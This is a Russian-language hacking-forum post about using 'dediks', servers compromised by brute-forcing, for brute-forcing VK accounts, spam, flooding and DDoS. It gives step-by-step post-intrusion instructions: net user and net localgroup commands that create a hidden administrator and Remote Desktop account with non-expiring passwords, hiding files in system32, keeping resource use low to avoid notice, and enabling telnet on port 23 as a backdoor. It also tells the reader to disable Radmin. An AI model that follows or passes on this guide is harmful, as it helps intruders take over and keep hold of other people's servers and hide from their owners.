Правила поведения на дедике

  • Автор темы cracker92
  • Дата начала
  • Просмотров 2591 Просмотров

cracker92

Местный
372
128
22 Июн 2019
Всем салют, дорогие друзья!
Надеемся, что вы знаете, что такое дедик. Но, на всякий случай, напоминаем:

Дедик - пошло от английского слова "dedicated",что означает выделенный. Полное название - "Dedicated Server", что означает выделенный сервер. Служат они для обработки данных, хранения различного материала, и т.д. Дедик это удалённый сервер (компьютер), который включен 24 часа в сутки. Так же они имеют довольно таки мощные сетевые интерфейсы, и аппаратную конфигурацию.
Для чего же их применяют? В чём они полезны?

Применяют их например для брута, спама, флуда, ддоса. В общем,для всех тех операций которые требуют продолжительного включенного компьютера и его нагрузки.

Приведу пример:

Тебе очень захотелось брутить ВК страницы, но ты не желаешь этого делать на своем компьютере, так как придётся оставлять включенный компьютер на много времени, и твой комп не на столько мощный, а брут будет очень сильно его нагружать, да и канал у тебя не из мощных. Что же делать?

Правильно, для этого есть дедик, зашел на дедик, залил всё нужное на него, поставил брутить, вышел из дедика,выключил комп, а сам пошел поспать или погулять, Потом вернулся, включил комп, зашел на дедик, забрал удачно сбрученные акки, и все дела!
Удобно не правда ли? Вот этим дедики и полезны.

Поговорим о правилах поведения на дедике

Данные правила применимы к дедикам, добытым методом брута.


И так, мы зашли на дедик. Первым делом, создаём новую учётную запись.

  • Открываем командную строку, зажав Win+R и прописав cmd.exe.
c9b414bc681b18f06f51f.png

Прописываем команды:

net user Имя_пользователя пароль /add

net localgroup Administrators Имя_пользователя /add

net localgroup "Remote Desktop Users" Имя_пользователя /add

net accounts /maxpwage:unlimited

0fe9a59b99eda296e25eb.png

Теперь перейдём непосредственно к правилам поведения.

  1. Не лезть к чужим учётным записям и их документам;
  2. Не удалять ничего лишнего;
  3. Не просматривайте через Удалённый рабочий стол динамически меняющийся контент - страницы насыщенные баннерами и тому подобное. Баннеры загружают любой интернет канал - это связано с особенностями сервиса «Удалённый рабочий стол»;
  4. Не устанавливать никаких программ, копировать всё уже в установленном виде;
  5. Не храните документы и программы на рабочем столе. Храните c:\windows\system32\… и глубже. Вспомните папки, в которые вы никогда не заходите;
  6. Нельзя сильно нагружать систему. Не более 30-50% процессора и 30-50% памяти, так как это будет заметно;
  7. Рекомендуется зайти в службы (сочетание Win+R, затем вводим services.msc) и включаем службу telnet (служба терминального доступа к компу). Так же, включить эту службу можно нажав сочетание Win+R, вводим cmd и в строке пишем start /w pkgmgr /iu:"TelnetClient", ставим ее в режим автоматического запуска. Это как черный вход на компьютер, если парадный закрыт. Естественно, если на дедике есть firewall, то заранее надо разрешить порт 23 TCP;
  8. Так же, можно в службах поискать Radmin и выключить его, если он имеется. Можно ещё просмотреть группу Remote Administrator Users на наличие других учётных записей. Только осторожно - не удалите случайно легальных пользователей.